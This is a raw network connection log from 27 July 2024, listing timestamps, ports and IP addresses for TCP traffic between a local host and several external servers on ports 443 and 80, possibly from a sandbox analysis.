Jul 27, 2024 08:54:17.025880098 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.025895119 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.025923967 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.025933027 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.026104927 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026146889 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026168108 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.026181936 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026207924 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.026225090 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.026316881 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026359081 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026376009 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.026381016 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026406050 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.026416063 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.026492119 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026530027 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026554108 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.026557922 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026585102 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.026585102 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.026673079 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026717901 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026727915 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.026737928 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026768923 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.026954889 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.026999950 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.027014017 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.027019024 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.027048111 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.027055025 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.027086020 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.027175903 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.027204037 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.027208090 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.027228117 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.027237892 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.029871941 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.092251062 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.092293978 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.092432976 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.092437983 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.092489958 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.116583109 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.116625071 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.116677999 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.116683006 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.116699934 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.116714954 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.116776943 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.116818905 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.116837025 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.116842031 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.116873026 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.116880894 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117068052 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117110014 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117125034 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117130041 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117158890 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117172003 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117264986 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117305994 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117324114 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117328882 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117352962 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117367983 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117496967 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117538929 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117563009 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117567062 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117588997 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117604017 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117671013 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117708921 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117733002 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117737055 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117753029 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117768049 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117872000 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117913008 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117928982 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.117933989 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.117969990 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.119887114 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.183660030 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.183702946 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.183734894 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.183739901 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.183768034 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.183787107 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.207490921 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.207530022 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.207679987 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.207679987 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.207686901 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.207726955 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.207921982 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.208004951 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.208036900 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.208041906 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.208066940 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.208089113 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.208540916 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.208579063 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.208600998 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.208605051 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.208636045 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.208651066 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.208796024 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.208837032 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.208861113 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.208865881 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.208894014 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.208909035 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.209045887 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.209083080 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.209108114 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.209111929 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.209141016 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.209158897 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.209192038 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.209233999 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.209254026 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.209258080 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.209284067 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.209300995 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.209542990 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.209583044 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.209604979 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.209609985 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.209635973 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.209650993 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.211133003 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.274396896 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.274439096 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.274601936 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.274601936 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.274607897 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.274653912 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.298429966 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.298471928 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.298722982 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.298727989 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.298768044 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.298774958 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.298794031 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.298826933 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.298840046 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.298852921 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.298863888 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.298897028 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.298923016 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.299122095 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.299161911 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.299199104 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.299202919 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.299226046 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.299238920 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.299395084 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.299436092 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.299451113 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.299454927 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.299493074 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.299606085 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.299645901 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.299669027 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.299673080 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.299701929 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.299717903 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.299808979 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.299849033 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.299866915 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.299873114 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.299899101 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.299913883 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.300012112 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.300054073 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.300076962 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.300081968 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.300107956 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.300121069 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.303416014 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.365422010 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.365463018 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.365497112 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.365502119 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.365528107 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.365540981 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.389604092 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.389646053 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.389780998 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.389786959 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.389800072 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.389846087 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.389997005 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.389997005 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.389997005 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.390002966 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.390022039 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.390043020 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.390047073 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.390059948 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.390074968 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.390094042 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.390096903 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.390121937 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.390146017 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.390151024 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.390172005 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.390202999 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.390314102 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.390362978 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.407809973 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.407809973 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:17.407819033 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.407828093 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:17.414768934 CEST	443	50697	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:17.414844990 CEST	443	50697	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:17.414916992 CEST	50697	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:17.429841042 CEST	50697	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:17.429878950 CEST	443	50697	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:17.429994106 CEST	50697	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:17.430010080 CEST	443	50697	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:17.534262896 CEST	50698	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:17.534284115 CEST	443	50698	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:17.534336090 CEST	50698	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:17.534725904 CEST	50698	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:17.534735918 CEST	443	50698	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:17.773197889 CEST	50699	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:17.779683113 CEST	80	50699	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:17.779759884 CEST	50699	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:17.779897928 CEST	50699	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:17.779931068 CEST	50699	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:17.784878016 CEST	80	50699	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:17.784885883 CEST	80	50699	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:18.185256004 CEST	443	50698	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:18.185326099 CEST	50698	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:18.188352108 CEST	50698	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:18.188354969 CEST	443	50698	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:18.188421965 CEST	50698	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:18.188424110 CEST	443	50698	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:18.188476086 CEST	50698	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:18.188510895 CEST	443	50698	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:18.188878059 CEST	443	50698	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:18.189084053 CEST	50698	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:18.189112902 CEST	443	50698	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:18.994676113 CEST	80	50699	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:18.994957924 CEST	80	50699	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:18.995040894 CEST	50699	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:18.995347023 CEST	50699	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:18.997771978 CEST	50700	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:19.006591082 CEST	80	50699	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:19.006608963 CEST	80	50700	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:19.006742954 CEST	50700	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:19.006902933 CEST	50700	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:19.006932020 CEST	50700	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:19.015706062 CEST	80	50700	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:19.015712976 CEST	80	50700	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:19.443918943 CEST	443	50698	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:19.444075108 CEST	443	50698	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:19.444144964 CEST	50698	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:19.458327055 CEST	50698	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:19.458338022 CEST	443	50698	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:19.458358049 CEST	50698	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:19.458362103 CEST	443	50698	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:19.573246002 CEST	50701	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:19.573335886 CEST	443	50701	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:19.573406935 CEST	50701	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:19.573839903 CEST	50701	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:19.573875904 CEST	443	50701	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:20.238903999 CEST	80	50700	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:20.239365101 CEST	80	50700	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:20.239644051 CEST	50700	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:20.239644051 CEST	50700	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:20.244729996 CEST	80	50700	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:20.245767117 CEST	50702	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:20.251493931 CEST	80	50702	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:20.251662016 CEST	50702	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:20.251796961 CEST	50702	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:20.251830101 CEST	50702	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:20.256845951 CEST	80	50702	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:20.258497000 CEST	80	50702	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:20.701039076 CEST	443	50701	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:20.701119900 CEST	50701	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:20.703737020 CEST	50701	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:20.703757048 CEST	443	50701	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:20.703819990 CEST	50701	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:20.703830957 CEST	443	50701	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:20.703886032 CEST	50701	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:20.703895092 CEST	443	50701	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:20.704602957 CEST	443	50701	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:20.704875946 CEST	50701	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:20.748519897 CEST	443	50701	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:21.519078970 CEST	80	50702	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:21.519357920 CEST	80	50702	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:21.519424915 CEST	50702	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:21.519562006 CEST	50702	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:21.524863958 CEST	80	50702	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:21.540601015 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:21.540652990 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:21.540776968 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:21.541138887 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:21.541162014 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:21.733503103 CEST	443	50701	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:21.733668089 CEST	443	50701	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:21.733746052 CEST	50701	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:21.747766018 CEST	50701	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:21.747809887 CEST	443	50701	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:21.747837067 CEST	50701	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:21.747853041 CEST	443	50701	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:21.852520943 CEST	50704	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:21.852559090 CEST	443	50704	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:21.852663040 CEST	50704	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:21.853097916 CEST	50704	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:21.853121996 CEST	443	50704	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:22.307445049 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.307646036 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.321536064 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.321599960 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.322465897 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.338745117 CEST	50703	443	192.168.2.4	162.0.235.84
Jul 27, 2024 08:54:22.380537987 CEST	443	50703	162.0.235.84	192.168.2.4
Jul 27, 2024 08:54:22.619369984 CEST	443	50704	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:22.619452000 CEST	50704	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:22.622374058 CEST	50704	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:22.622391939 CEST	443	50704	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:22.622445107 CEST	50704	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:22.622453928 CEST	443	50704	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:22.622502089 CEST	50704	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:22.622510910 CEST	443	50704	107.173.160.137	192.168.2.4
